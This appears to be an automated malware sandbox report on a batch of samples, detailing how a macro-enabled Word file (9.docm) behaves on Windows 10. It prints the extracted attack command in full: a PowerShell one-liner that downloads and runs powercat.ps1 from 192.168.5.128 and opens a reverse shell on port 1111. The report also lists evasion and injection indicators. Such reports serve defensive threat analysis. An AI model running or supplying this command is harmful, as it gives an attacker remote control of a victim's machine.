Overview
overview
10Static
static
101.exe
windows7_x64
61.exe
windows10-2004_x64
610.exe
windows7_x64
1010.exe
windows10-2004_x64
102.doc
windows7_x64
102.doc
windows10-2004_x64
13.xlsx
windows7_x64
103.xlsx
windows10-2004_x64
14.exe
windows7_x64
104.exe
windows10-2004_x64
15.exe
windows7_x64
105.exe
windows10-2004_x64
16.exe
windows7_x64
106.exe
windows10-2004_x64
107.exe
windows7_x64
107.exe
windows10-2004_x64
18.exe
windows7_x64
108.exe
windows10-2004_x64
109.docm
windows7_x64
109.docm
windows10-2004_x64
10rip.bat
windows7_x64
10rip.bat
windows10-2004_x64
10Analysis
-
max time kernel
107s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
23-03-2022 21:00
Static task
static1
Behavioral task
behavioral1
Sample
1.exe
Resource
win7-20220310-en
Behavioral task
behavioral2
Sample
1.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral3
Sample
10.exe
Resource
win7-20220310-en
Behavioral task
behavioral4
Sample
10.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral5
Sample
2.doc
Resource
win7-20220311-en
Behavioral task
behavioral6
Sample
2.doc
Resource
win10v2004-20220310-en
Behavioral task
behavioral7
Sample
3.xlsx
Resource
win7-20220311-en
Behavioral task
behavioral8
Sample
3.xlsx
Resource
win10v2004-20220310-en
Behavioral task
behavioral9
Sample
4.exe
Resource
win7-20220311-en
Behavioral task
behavioral10
Sample
4.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral11
Sample
5.exe
Resource
win7-20220310-en
Behavioral task
behavioral12
Sample
5.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral13
Sample
6.exe
Resource
win7-20220310-en
Behavioral task
behavioral14
Sample
6.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral15
Sample
7.exe
Resource
win7-20220311-en
Behavioral task
behavioral16
Sample
7.exe
Resource
win10v2004-20220310-en
Behavioral task
behavioral17
Sample
8.exe
Resource
win7-20220311-en
Behavioral task
behavioral18
Sample
8.exe
Resource
win10v2004-20220310-en
Behavioral task
behavioral19
Sample
9.docm
Resource
win7-20220311-en
Behavioral task
behavioral20
Sample
9.docm
Resource
win10v2004-en-20220113
Behavioral task
behavioral21
Sample
rip.bat
Resource
win7-20220310-en
Behavioral task
behavioral22
Sample
rip.bat
Resource
win10v2004-en-20220113
General
-
Target
9.docm
Malware Config
Extracted
http://192.168.5.128/powercat.ps1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4976 2736 cmd.exe WINWORD.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2736 WINWORD.EXE 2736 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 364 powershell.exe 364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 364 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 2736 wrote to memory of 4976 2736 WINWORD.EXE cmd.exe PID 2736 wrote to memory of 4976 2736 WINWORD.EXE cmd.exe PID 4976 wrote to memory of 364 4976 cmd.exe powershell.exe PID 4976 wrote to memory of 364 4976 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SYSTEM32\cmd.execmd /c powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128/powercat.ps1');powercat -c 192.168.5.128 -p 1111 -e cmd2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128/powercat.ps1');powercat -c 192.168.5.128 -p 1111 -e cmd3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364
-
-